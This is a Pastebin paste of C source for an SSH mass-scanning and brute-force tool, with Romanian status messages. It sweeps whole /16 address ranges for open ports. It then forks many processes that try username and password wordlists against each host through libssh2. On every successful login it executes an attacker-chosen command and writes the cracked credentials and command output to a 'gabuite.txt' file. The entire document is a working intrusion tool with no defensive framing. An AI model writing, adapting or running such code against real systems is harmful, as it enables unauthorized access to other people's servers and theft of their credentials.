API tools faq
paste
Advertisement
Guest User

SANDUCIORBA SUPREME

a guest
Jan 4th, 2018
158
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.79 KB | None | 0 0
raw download clone embed print report
  1. #define LIBSSH2_STATIC 1
  2. #include "libssh2_config.h"
  3. #include <libssh2.h>
  4. #ifdef HAVE_WINSOCK2_H
  5. # include <winsock2.h>
  6. #endif
  7. #ifdef HAVE_SYS_SOCKET_H
  8. # include <sys/socket.h>
  9. #endif
  10. #ifdef HAVE_NETINET_IN_H
  11. # include <netinet/in.h>
  12. #endif
  13. #ifdef HAVE_SYS_SELECT_H
  14. # include <sys/select.h>
  15. #endif
  16. # ifdef HAVE_UNISTD_H
  17. #include <unistd.h>
  18. #endif
  19. #ifdef HAVE_ARPA_INET_H
  20. # include <arpa/inet.h>
  21. #endif
  22. #include <sys/time.h>
  23. #include <sys/types.h>
  24. #include <stdlib.h>
  25. #include <fcntl.h>
  26. #include <string.h>
  27. #include <errno.h>
  28. #include <stdio.h>
  29. #include <ctype.h>
  30. #include <netdb.h>
  31. #include <time.h>
  32. #include <sys/wait.h>
  33. #include <termios.h>
  34. #define ALB "\033[1;37m"
  35. #define ALB2 "\033[5;37m"
  36. #define NORM "\033[00;00m"
  37. #define BOLD "\033[00;01m"
  38. #define ROSU "\033[01;31m"
  39. #define GALBE "\033[01;33m"
  40. #define VERDE "\033[01;32m"
  41. #define ALBASTRU "\033[01;34m"
  42. #define FAKE "sftp-server"
  43.  
  44. #define COMPUTATIONS 3000
  45. #define TOTAL_VAL_COUNT 254
  46. #define MAX_SOCKETS 1000
  47. #define TIMEOUT 3
  48.  
  49. #define S_NONE 0
  50. #define S_CONNECTING 1
  51. #define TABLELEN 63
  52. #define BUFFFERLEN 128
  53.  
  54. #define ENCODERLEN 4
  55. #define ENCODEROPLEN 0
  56. #define ENCODERBLOCKLEN 3
  57.  
  58. #define PADDINGCHAR '='
  59. #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\
  60. "abcdefghijklmnopqrstuvwxyz"\
  61. "0123456789"\
  62. "+/";
  63. #define _FILE_OFFSET_BITS 64
  64. #define EOL '\n'
  65. #define CAR_RETURN '\r'
  66. #define SUCCESS 0
  67. #define FAILURE -1
  68.  
  69.  
  70. struct conn_t {
  71. int s;
  72. char status;
  73. time_t a;
  74. struct sockaddr_in addr;
  75. };
  76. struct conn_t connlist[MAX_SOCKETS];
  77.  
  78. void init_sockets(void);
  79. void check_sockets(void);
  80. void fatal(char *);
  81.  
  82. FILE *outfd;
  83. int tot = 0;
  84. int flag,where;
  85. int numforks,maxf;
  86.  
  87. unsigned char denominator = TOTAL_VAL_COUNT+1;
  88.  
  89.  
  90.  
  91. char *replace_str(char *str, char *orig, char *rep)
  92. {
  93. static char buffer[4096];
  94. char *p;
  95.  
  96. if(!(p = strstr(str, orig)))
  97. return str;
  98.  
  99. strncpy(buffer, str, p-str);
  100. buffer[p-str] = '\0';
  101.  
  102. sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig));
  103.  
  104. return buffer;
  105. }
  106.  
  107.  
  108. void init_sockets(void)
  109. {
  110. int i;
  111.  
  112. for (i = 0; i < MAX_SOCKETS; i++)
  113. {
  114. connlist[i].status = S_NONE;
  115. memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in));
  116. }
  117. return;
  118. }
  119.  
  120. void check_sockets(void)
  121. {
  122. int i, ret;
  123.  
  124. for (i = 0; i < MAX_SOCKETS; i++)
  125. {
  126. if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING))
  127. {
  128. close(connlist[i].s);
  129. connlist[i].status = S_NONE;
  130. }
  131. else if (connlist[i].status == S_CONNECTING)
  132. {
  133. ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr,
  134. sizeof(struct sockaddr_in));
  135. if (ret == -1)
  136. {
  137. if (errno == EISCONN)
  138. {
  139. tot++;
  140. fprintf(outfd, "%s\n",
  141. (char *)inet_ntoa(connlist[i].addr.sin_addr));
  142. close(connlist[i].s);
  143. connlist[i].status = S_NONE;
  144. }
  145.  
  146. if ((errno != EALREADY) && (errno != EINPROGRESS))
  147. {
  148. close(connlist[i].s);
  149. connlist[i].status = S_NONE;
  150. }
  151. }
  152. else
  153. {
  154. tot++;
  155. fprintf(outfd, "%s\n",
  156. (char *)inet_ntoa(connlist[i].addr.sin_addr));
  157. close(connlist[i].s);
  158. connlist[i].status = S_NONE;
  159. }
  160. }
  161. }
  162. }
  163.  
  164. void fatal(char *err)
  165. {
  166. int i;
  167. printf("Error: %s\n", err);
  168. for (i = 0; i < MAX_SOCKETS; i++)
  169. if (connlist[i].status >= S_CONNECTING)
  170. close(connlist[i].s);
  171. fclose(outfd);
  172. exit(EXIT_FAILURE);
  173. }
  174.  
  175. static int waitsocket(int socket_fd, LIBSSH2_SESSION *session)
  176. {
  177. struct timeval timeout;
  178. int rc;
  179. fd_set fd;
  180. fd_set *writefd = NULL;
  181. fd_set *readfd = NULL;
  182. int dir;
  183.  
  184. timeout.tv_sec = 2;
  185. timeout.tv_usec = 0;
  186.  
  187. FD_ZERO(&fd);
  188.  
  189. FD_SET(socket_fd, &fd);
  190.  
  191. dir = libssh2_session_block_directions(session);
  192.  
  193.  
  194. if(dir & LIBSSH2_SESSION_BLOCK_INBOUND)
  195. readfd = &fd;
  196.  
  197. if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND)
  198. writefd = &fd;
  199.  
  200. rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout);
  201.  
  202. return rc;
  203. }
  204.  
  205. int checkauth(char *username,char *password,char *hostname, char *portar, char *command)
  206. {
  207. const char *commandline = command;
  208. FILE *vulnf,*nolog;
  209. unsigned long hostaddr;
  210. int sock, port;
  211. struct sockaddr_in sin;
  212. const char *fingerprint;
  213. LIBSSH2_SESSION *session;
  214. LIBSSH2_CHANNEL *channel;
  215. int rc;
  216. int exitcode;
  217. char *exitsignal=(char *)"none";
  218. int bytecount = 0;
  219. size_t len;
  220. int type, var;
  221. struct timeval timeout;
  222. timeout.tv_sec = 10;
  223. timeout.tv_usec = 0;
  224. port=atoi(portar);
  225. rc = libssh2_init (0);
  226.  
  227. if (rc != 0) {
  228. fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
  229. return 1;
  230. }
  231.  
  232. hostaddr = inet_addr(hostname);
  233.  
  234. sock = socket(AF_INET, SOCK_STREAM, 0);
  235.  
  236. sin.sin_family = AF_INET;
  237. sin.sin_port = htons(port);
  238. sin.sin_addr.s_addr = hostaddr;
  239.  
  240. if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout,
  241. sizeof(timeout)) < 0)
  242. error("setsockopt failed\n");
  243.  
  244. if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout,
  245. sizeof(timeout)) < 0)
  246. error("setsockopt failed\n");
  247.  
  248. if (connect(sock, (struct sockaddr*)(&sin),
  249. sizeof(struct sockaddr_in)) != 0) {
  250. return -1;
  251. }
  252.  
  253. session = libssh2_session_init();
  254.  
  255. while ((rc = libssh2_session_handshake(session, sock)) ==
  256.  
  257. LIBSSH2_ERROR_EAGAIN);
  258. if (rc) {
  259.  
  260. return -1;
  261. }
  262.  
  263. while ((rc = libssh2_userauth_password(session, username, password)) ==
  264.  
  265. LIBSSH2_ERROR_EAGAIN);
  266. if (rc) {
  267.  
  268. goto shutdown;
  269. }
  270.  
  271.  
  272. while( (channel = libssh2_channel_open_session(session)) == NULL &&
  273.  
  274. libssh2_session_last_error(session,NULL,NULL,0) ==
  275.  
  276. LIBSSH2_ERROR_EAGAIN )
  277. {
  278. waitsocket(sock, session);
  279. }
  280. if( channel == NULL )
  281. {
  282.  
  283. goto shutdown;
  284. }
  285.  
  286. while( (rc = libssh2_channel_exec(channel, commandline)) ==
  287.  
  288. LIBSSH2_ERROR_EAGAIN )
  289. {
  290. waitsocket(sock, session);
  291. }
  292.  
  293.  
  294. if( rc != 0 )
  295. {
  296.  
  297. goto shutdown;
  298. }
  299.  
  300.  
  301. for( ;; )
  302. {
  303.  
  304. int rc;
  305. do
  306. {
  307. char buffer[65535];
  308. rc = libssh2_channel_read( channel, buffer, sizeof(buffer) );
  309.  
  310. if( rc > 0 )
  311. {
  312. int i;
  313. bytecount += rc;
  314. hostname = strtok (hostname, "\n");
  315. fprintf(stderr, "<#> L-am prins ma --> USER -> %s PAROLA -> %s IP -> %s Parola -> %s \n", username,password,hostname, portar);
  316. fprintf(stderr, "<#> Informatii --> %s \n", buffer);
  317. vulnf=fopen("gabuite.txt","a+");
  318. fprintf(vulnf,"L-o prins ma --> %s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer);
  319. fclose(vulnf);
  320. goto shutdown;
  321. for( i=0; i < rc; ++i )
  322. var = i;
  323. }
  324.  
  325. else {
  326. if( rc != LIBSSH2_ERROR_EAGAIN )
  327.  
  328. goto shutdown;
  329. }
  330. }
  331. while( rc > 0 );
  332.  
  333.  
  334. if( rc == LIBSSH2_ERROR_EAGAIN )
  335. {
  336. waitsocket(sock, session);
  337. }
  338. else
  339. break;
  340. }
  341.  
  342. exitcode = 127;
  343. while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN )
  344.  
  345. waitsocket(sock, session);
  346.  
  347. if( rc == 0 )
  348. {
  349. exitcode = libssh2_channel_get_exit_status( channel );
  350.  
  351. libssh2_channel_get_exit_signal(channel, &exitsignal,
  352.  
  353. NULL, NULL, NULL, NULL, NULL);
  354. }
  355.  
  356. if (exitsignal)
  357. var = var;
  358. else
  359. var = var;
  360.  
  361. libssh2_channel_free(channel);
  362. close(sock);
  363. channel = NULL;
  364. libssh2_session_disconnect(session,
  365.  
  366. "Normal Shutdown, Thank you for playing");
  367. libssh2_session_free(session);
  368. libssh2_exit();
  369. exit(0);
  370.  
  371. shutdown:
  372.  
  373. libssh2_session_disconnect(session,
  374.  
  375. "Normal Shutdown, Thank you for playing");
  376. libssh2_session_free(session);
  377.  
  378. #ifdef WIN32
  379. closesocket(sock);
  380. #else
  381. close(sock);
  382. #endif
  383. var = var;
  384.  
  385. libssh2_exit();
  386. return 0;
  387. }
  388.  
  389. int scanbclass(char *bclass, char *port)
  390. {
  391. int done = 0, i, cip = 1, bb = 0, ret, k, ns, x;
  392. time_t scantime;
  393. char ip[20], outfile[128], last[256];
  394. int unlink(const char *pathname);
  395.  
  396. errno = 0;
  397. if(unlink("scan.log"))
  398. {
  399. printf("\n unlink() failed - [%s]\n",strerror(errno));
  400. }
  401. memset(&outfile, 0, sizeof(outfile));
  402.  
  403. snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port);
  404.  
  405. if (!(outfd = fopen(outfile, "a")))
  406. {
  407. perror(outfile);
  408. exit(EXIT_FAILURE);
  409. }
  410. printf("<#> Cautam --> ", bclass);
  411. fflush(stdout);
  412.  
  413. memset(&last, 0, sizeof(last));
  414. init_sockets();
  415. scantime = time(0);
  416.  
  417. while(!done)
  418. {
  419. for (i = 0; i < MAX_SOCKETS; i++)
  420. {
  421. if (cip == 255)
  422. {
  423. if (bb == 255)
  424. {
  425. ns = 0;
  426. for (k = 0; k < MAX_SOCKETS; k++)
  427. {
  428. if (connlist[k].status > S_NONE)
  429. {
  430. ns++;
  431. break;
  432. }
  433. }
  434.  
  435. if (ns == 0)
  436. done = 1;
  437.  
  438. break;
  439. }
  440. else
  441. {
  442. cip = 0;
  443. bb++;
  444. for (x = 0; x < strlen(last); x++)
  445. putchar('\b');
  446. memset(&last, 0, sizeof(last));
  447. snprintf(last, sizeof(last) - 1, "Clasa %s.%d.* Pe Port-ul %s (Am gasit %d de ip-uri) (%.1f%% S-a Facut)",
  448. bclass, bb, port, tot, (bb / 255.0) * 100);
  449. printf("%s", last);
  450. fflush(stdout);
  451. }
  452. }
  453.  
  454. if (connlist[i].status == S_NONE)
  455. {
  456. connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
  457. if (connlist[i].s == -1)
  458. printf("Unable to allocate socket.\n");
  459. else
  460. {
  461. ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
  462. if (ret == -1)
  463. {
  464. printf("Unable to set O_NONBLOCK\n");
  465. close(connlist[i].s);
  466. }
  467. else
  468. {
  469. memset(&ip, 0, 20);
  470. sprintf(ip, "%s.%d.%d", bclass, bb, cip);
  471. connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
  472. if (connlist[i].addr.sin_addr.s_addr == -1)
  473. fatal("Invalid IP.");
  474. connlist[i].addr.sin_family = AF_INET;
  475. connlist[i].addr.sin_port = htons(atoi(port));
  476. connlist[i].a = time(0);
  477. connlist[i].status = S_CONNECTING;
  478. cip++;
  479. }
  480. }
  481. }
  482. }
  483. check_sockets();
  484. }
  485.  
  486. printf("\n<#> Am terminat de scanat in %u secunde. (Avem %d ip-uri)\n", (time(0) - scantime), tot);
  487. fclose(outfd);
  488. return 1;
  489. }
  490.  
  491.  
  492. int line_count(char* __str_file_name) {
  493. FILE* fd;
  494. int ch;
  495. if ((fd = fopen(__str_file_name, "r")) == NULL) {
  496. printf("[Error] : While opening the file\n");
  497. exit(0);
  498. }
  499.  
  500. unsigned int line_count = 0;
  501. while ( (ch = fgetc(fd)) != EOF)
  502. if (ch == EOL || ch == CAR_RETURN)
  503. ++line_count;
  504.  
  505. if (fd) {
  506. fclose(fd);
  507. }
  508.  
  509. return line_count;
  510. }
  511.  
  512. int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline)
  513. {
  514. int numforks, maxf, status;
  515. FILE *fp,*passf, *userf;
  516. char buff[4096];
  517. char nutt2[4096];
  518. char nutt[4096];
  519. char *pass, *user;
  520. malloc(sizeof(nutt));
  521. malloc(sizeof(nutt2));
  522. malloc(sizeof(buff));
  523. pid_t PID;
  524. char *ns = NULL;
  525. maxf=atoi(thr);
  526. if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile));
  527. while (fgets(nutt2,sizeof(nutt2),userf)){
  528. user = strdup (nutt2);
  529. user = strtok (user, "\n");
  530. if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile));
  531. while (fgets(nutt,sizeof(nutt),passf)) {
  532. pass = strdup (nutt);
  533. pass = strtok (pass, "\n");
  534. ns = replace_str(pass, "$user", user);
  535. printf("<#> Incerc USER-ul %s impreuna cu Parola %s\n",user,ns);
  536. if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile));
  537. while(fgets(buff,sizeof(buff),fp))
  538. {
  539. PID = fork();
  540. if (PID < 0) {
  541. fprintf(stderr, "[!] Couldn't fork!\n");
  542. exit(1);
  543. }
  544. if (( PID == 0 )){
  545.  
  546. checkauth(user,ns,buff, portar, commandline);
  547. //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot);
  548. exit(0);
  549. }
  550. else
  551. {
  552. numforks++;
  553. if (numforks > maxf)
  554. for (numforks; numforks > maxf; numforks--)
  555. PID = wait(&status);
  556. }
  557. }
  558. fclose(fp);
  559. }
  560. fclose(passf);
  561. }
  562. fclose(userf);
  563. exit(0);
  564. }
  565.  
  566. int main(int argc, char *argv[])
  567. {
  568. int input,i=0;
  569. FILE *fp,*passf, *userf, *scanf;
  570. char encodedoutput[BUFFFERLEN + 1] = "";
  571. char decodedoutput[BUFFFERLEN + 1] = "";
  572. char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot;
  573. if(strcmp(argv[1],"-f")==0) { input = 1; }
  574. if(strcmp(argv[1],"-r")==0) { input = 2; }
  575. if(strcmp(argv[1],"-R")==0) { input = 3; }
  576. if(strcmp(argv[1],"-b")==0) { input = 4; }
  577.  
  578. switch ( input ) {
  579.  
  580. case 1:
  581. for (i = 0; i < argc; i++){
  582. if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; }
  583. if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; }
  584. if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; }
  585. if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; }
  586. if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; }
  587. }
  588. scanfile = argv[2];
  589. if((scanf=fopen(scanfile,"r"))!= NULL){
  590. if (atoi(threads)) {
  591. if (atoi(port) > 2) {
  592. if((userf=fopen(userfile,"r"))!=NULL){
  593. if((passf=fopen(passfile,"r"))!=NULL){
  594. if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);}
  595. else { goto err; }
  596. } else { goto err; }
  597. } else { goto err; }
  598. } else { goto err; }
  599. } else { goto err; }
  600. } else { goto err; }
  601. break;
  602.  
  603. case 2:
  604. for (i = 0; i < argc; i++){
  605. if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; }
  606. if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; }
  607. if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; }
  608. if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; }
  609. if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; }
  610. }
  611. if (atoi(threads)) {
  612. if (atoi(port) > 2) {
  613. if((userf=fopen(userfile,"r"))!=NULL){
  614. if((passf=fopen(passfile,"r"))!=NULL){
  615. if(command != NULL) {
  616. //genrand(argv[0],threads,userfile,passfile,port,command);
  617. }
  618. else { goto err; }
  619. } else { goto err; }
  620. } else { goto err; }
  621. } else { goto err; }
  622. } else { goto err; }
  623. break;
  624.  
  625. case 3:
  626. for (i = 0; i < argc; i++){
  627. if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; }
  628. if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; }
  629. }
  630. if (atoi(threads)) {
  631. if (atoi(port) > 2) {
  632. //genrandl(threads, port);
  633. } else { goto err; }
  634. } else { goto err; }
  635. break;
  636.  
  637. case 4:
  638. for (i = 0; i < argc; i++){
  639. if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; }
  640. if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; }
  641. if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; }
  642. if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; }
  643. if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; }
  644. }
  645. bclass = argv[2];
  646. if (atoi(threads)) {
  647. if (atoi(port) > 2) {
  648. if((userf=fopen(userfile,"r"))!=NULL){
  649. if((passf=fopen(passfile,"r"))!=NULL){
  650. if(command != NULL) {
  651.  
  652. scanbclass(bclass, port);
  653. scan(argv[0],threads,"scan.log",userfile,passfile,port, command);
  654. }
  655. else { goto err; }
  656. } else { goto err; }
  657. } else { goto err; }
  658. } else { goto err; }
  659. } else { goto err; }
  660.  
  661. break;
  662.  
  663. default:
  664. printf( "Bad command, quitting!\n" );
  665. exit (0);
  666. break;
  667. }
  668. getchar();
  669. exit (0);
  670. err:
  671. exit (-1);
  672. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!